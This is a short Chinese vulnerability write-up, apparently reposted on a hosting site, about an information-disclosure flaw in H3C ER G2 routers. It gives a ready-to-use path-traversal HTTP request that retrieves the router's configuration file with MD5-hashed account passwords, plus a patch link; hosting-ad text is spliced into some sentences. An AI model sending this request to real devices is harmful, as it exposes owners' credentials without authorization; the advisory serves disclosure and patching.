声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
一、产品介绍
H3C ER2200G2是H3C推出的新一代高性能企业级路由器,采用全新硬件架构、具备丰富的软件功能、支持全面的安全策略。服务器托管网定位于以太网/光纤/xDSL接入的中小商业市场(SMB),可部署于需要高速Internet接入的政府机构、中小企业、餐饮连锁、酒店、学校、医院、网吧等网络环境。
二、漏洞介绍
H3C ER G2系列版本存在敏感信息泄露漏洞。攻击者通过actionpolicy_status跳转别的接口,利用该漏洞访问ER服务器托管网2200G2.cfg文件。
三、影响版本
漏洞名称 | H3C ER G2系列路由器敏感信息泄露漏洞 |
厂商 | 华三 |
危害等级 |
高危 |
四、漏洞复现
1.访问漏洞环境
2.Poc
GET /userLogin.asp/../actionpolicy_status/../ER2200G2.cfg HTTP/1.1
Host: xxxxxxxxxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: image/avif,image/webp,*/*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
请求该地址查看响应结果
此文件中还存在泄漏的账户密码信息。(此处为MD5加密)
五、修复建议
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://www.h3c.com/cn/Products___Technology/Products/Router/Catalog/ER/ER3200/
服务器托管,北京服务器托管,服务器租用 http://www.fwqtg.net
相关推荐: 智慧物流|Springboot+Vue+Nodejs实现智慧物流系统
作者主页:编程指南针 作者简介:Java领域优质创作者多年架构师设计经验、腾讯课堂常驻讲师 主要内容:Java项目、毕业设计、简历模板、学习资料、面试题库、技术互助 收藏点赞不迷路 关注作者有好处 文末获取源码 项目编号:BS-XX-162 …